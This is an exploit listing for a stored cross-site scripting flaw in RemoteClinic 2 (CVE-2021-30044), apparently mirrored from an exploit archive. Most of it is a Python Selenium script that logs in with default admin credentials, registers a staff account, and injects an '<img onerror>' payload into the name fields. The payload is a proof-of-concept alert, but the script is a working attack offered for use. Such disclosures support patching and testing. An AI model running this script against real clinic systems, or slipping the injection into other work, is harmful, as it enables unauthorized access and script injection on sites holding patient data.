Exploit for RemoteClinic 2 Cross Site Scripting CVE-2021-30044

## https://sploitus.com/exploit?id=PACKETSTORM:162262
# Exploit Title: Cross Site Scripting (XSS) RemoteClinic on register.php  
# Author: nu11secur1ty  
# Debug: g3ck0dr1v3r  
# Date: 04.21.2021  
# Vendor: RemoteClinic  
# Link: https://github.com/remoteclinic/RemoteClinic  
# CVE: CVE-2021-30044  
  
[+] Exploit Source:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30044  
  
[Exploit Program Code]  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug: g3ck0dr1v3r  
# CVE-2021-30044  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/RemoteClinic/login/"  
  
#enter your login username  
username="admin@domain.ext"  
  
#enter your login password  
password="remoteclinic"  
  
#enter the element for username input field  
element_for_username="user_id"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="submit"  
  
# Dai brauzura aaa ta eba  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
  
# Otvarai da ne vlazam s kasata  
browser.get((website_link))  
  
# Run...  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
  
### Login  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
### Exploit  
element_for_natrutvanie="submit"  
browser.get(("http://localhost/RemoteClinic/staff/register.php"))  
  
### Inner text...  
browser.execute_script("document.querySelector('[name=\"first_name\"]').value  
= '<img src=1 onerror=alert(`Please_fix_it`)>'")  
browser.execute_script("document.querySelector('[name=\"last_name\"]').value  
= '<img src=1 onerror=alert(`Please_fix_it`)>'")  
browser.execute_script("document.querySelector('[name=\"userid\"]').value =  
'nu11secur1ty@gmail.com'")  
browser.execute_script("document.querySelector('[name=\"passkey\"]').value  
= 'password'")  
browser.execute_script("document.querySelector('[name=\"contact\"]').value  
= '123456789'")  
browser.execute_script("document.querySelector('[name=\"mobile\"]').value =  
'12345678910'")  
browser.execute_script("document.querySelector('[name=\"skype\"]').value =  
'nu11secur1ty'")  
browser.execute_script("document.querySelector('[name=\"address\"]').value  
= 'Kurec A 31'")  
browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png")  
time.sleep(5)  
  
# Submit exploit  
signInButton = browser.find_element_by_name(element_for_natrutvanie)  
signInButton.click()  
  
# Maani sa i testwai posle  
time.sleep(1)  
browser.get(("http://localhost/RemoteClinic/login/signout.php"))  
browser.close()  
  
  
print("payload is deployed...\n")  
except Exception:  
  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")